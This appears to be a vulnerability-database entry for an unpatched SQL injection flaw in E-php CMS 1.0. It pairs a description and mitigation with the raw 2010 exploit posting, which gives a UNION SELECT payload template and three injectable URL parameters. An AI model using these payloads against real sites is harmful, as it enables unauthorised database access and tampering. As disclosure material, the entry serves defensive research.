E-php CMS SQL Injection Vulnerability

vendor:

E-php CMS

by:

Th3 RDX

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: E-php CMS

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:ephpscripts:e-php

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Demo Site

2010

E-php CMS SQL Injection Vulnerability

E-php CMS is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow an attacker to modify the logic of the executed query.

Source

Exploit-DB raw data:

# Exploit Title: E-php CMS SQL Injection Vulnerability
# Date: 22-03-2010
# Author: Th3 RDX
# Software Link:
# Version: 1.0
# Tested on: Demo Site
# category: webapp
# Code :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to ### www.Teamicw.in | www.IndiShell.in | www.AndhraHackers.com ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Sp3c1al Th4nkz to : R00T and R45C4L
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

Th3 RDX

----- [ E - mail ] -----

th3rdx@gmail.com


%\\
##############################################################################

##############################################################################
%//

----- [Title] -----

E-php CMS SQL Injection Vulnerability

----- [ Vendor ] -----

http://www.ephpscripts.com/content-management-system.php

%\\
##############################################################################

##############################################################################
%//

----- [ Exploit (s) ] -----

Put [CODE] = SQL Injection Code

{e.g = article.php?es_id=11+and+1=0+ Union Select 1 , UNHEX(HEX([visible]))
,3,4,5,6,7,8,9,10,11,12 (tables & column) }

[SQLi] http://server/e-php/article.php?es_id=11[CODE]

[SQLi] http://server/e-php/browsecats.php?cid=6[CODE]

[SQLi] http://server/e-php/event_desc.php?es_id=4[CODE]


%\\
##############################################################################



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanks To All: I.C.W + W.O.I + H.M.G + C.I.A + AH Members
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 22 March 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=